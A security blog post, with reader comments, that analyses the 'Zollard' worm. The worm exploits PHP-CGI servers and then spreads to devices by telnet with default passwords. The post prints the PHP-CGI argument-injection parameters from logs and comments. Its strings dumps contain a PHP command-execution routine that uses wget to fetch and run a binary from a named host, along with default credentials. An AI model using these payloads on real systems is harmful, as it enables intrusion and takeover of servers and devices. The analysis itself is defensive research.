We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts. So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.
Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran
The decoded POST is:
-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n
Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.
All files were fetched, and the x86 file was sandboxed on a linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455. The linux malware also opened up a listener on my VM's port 58455.
Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006
Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:
As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files:
Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran
PHP exploit attempt from 78.39.232.113 |
-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n
Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.
All files were fetched, and the x86 file was sandboxed on a linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455. The linux malware also opened up a listener on my VM's port 58455.
Compromised host listening on port 58455 |
Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006
Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:
Example of Telnet session to a BusyBox device |
Example of Telnet session to ARM architecture device |
As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files:
#EgvT2
@ #! !1C " V! 0 /proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/0.run /var/1.run /var/idhash /var/response /var/challenge /var/b.arm_v5t /var/b.arm_v6k /var/f.arm_v5t /var/f-t2.arm_v6k /var/f-t2.mips /var/f-t2.mipsel /var/sp.arm_v5t /var/sp.arm_v6k /var/t2.arm_v6k /var/readme /var/b/b3.arm_v5t /var/b/b3.arm_v6k /var/b/b3.mips /var/b/b3.ramips /var/b/b3.rtl /var/b/readme /var/b/0.run /var/b/1.run /var/b/idhash /dav/0.run /dav/1.run /dav/b3.arm_v5t /dav/b3.arm_v6k /dav/b3.mips /dav/b3.rtl /dav/idhash /dav/readme /var/b /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .bss .comment | /proc/self/exe nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/tmp/ep2.mips /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mips mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .reginfo .text .rodata .data.rel.ro .data .got .sbss .bss .comment .mdebug.abi32 .pdr |
Strings from 'arm' file
|
Strings from 'mips' file
|
/proc/self/exe
nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii ep2.mips /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /var/tmp/ep2.mips /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m GYvh QdV[3 y8G9 lQ\a< echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .reginfo .text .rodata .data.rel.ro .data .got .sbss .bss .comment .mdebug.abi32 .pdr |
/proc/self/exe
nodes POST Host: User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd /bin/sh /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii ep2.ppc /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /usr/bin/wget /usr/bin/-wget /var/run/z reboot #!/bin/sh ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot killall arm ppc mips mipsel sleep 10 /var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot GET / HTTP/1.1 Host: mips mipsel /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m GYvh QdV[3 y8G9 lQ\a< echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh admin root 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .sbss .bss .comment |
Strings from 'mipsel' file
|
Strings from 'ppc' file
|
Host:
User-Agent: Zollard Content-Type: application/x-www-form-urlencoded Content-Length: Connection: close $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); function myshellexec($cmd) global $disablefunc; $result = ""; if (!empty($cmd)) if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); return $result; myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86"); myshellexec("chmod +x /tmp/x86"); myshellexec("/tmp/x86"); HTTP/1.1 200 OK httpd nodes /bin/sh GET / HTTP/1.1 Host: /proc /proc/ /stat insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko iptables -D INPUT -p tcp --dport 23 -j DROP iptables -A INPUT -p tcp --dport 23 -j DROP telnetd /var/run/.lightpid /var/run/.aidrapid /var/run/lightpid /var/run/.lightscan /var/run/lightscan /var/run/mipsel /var/run/mips /var/run/sh /var/run/arm /var/run/ppc /var/run/m /var/run/mi /var/run/s /var/run/a /var/run/p /var/run/msx /var/run/mx /var/run/sx /var/run/ax /var/run/px /var/run/32 /var/run/sel /var/run/pid /var/run/gcc /var/run/dev /var/run/psx /var/run/mpl /var/run/mps /var/run/sph /var/run/arml /var/run/mips.l /var/run/mipsell /var/run/ppcl /var/run/shl /bin/pp /bin/mi /bin/mii /var/tmp/dreams.install.sh /var/tmp/ep2.ppc /usr/bin/wget /usr/bin/-wget /cgi-bin/php /cgi-bin/php5 /cgi-bin/php-cgi /cgi-bin/php.cgi /cgi-bin/php4 EHW: p"XW m > echo -n > && echo -e \\x5A mkdir -p /var/run/.zollard/ chmod +x cp /bin/sh root 1234 12345 dreambox smcadmin 0!0 SHA1 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 GCC: (GNU) 4.1.2 .shstrtab .text .rodata .data .bss .comment |
Strings from 'x86' file
So who is "Zollard"? What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts. At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.
We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured.
I got something similar. Different source IP though:
ReplyDelete14.136.48.11 - - [30/Dec/2013:06:33:02 -0500] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 444 0 "-" "Zollard" "-"
The post part (I've received the same string) resolves to:
ReplyDelete?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n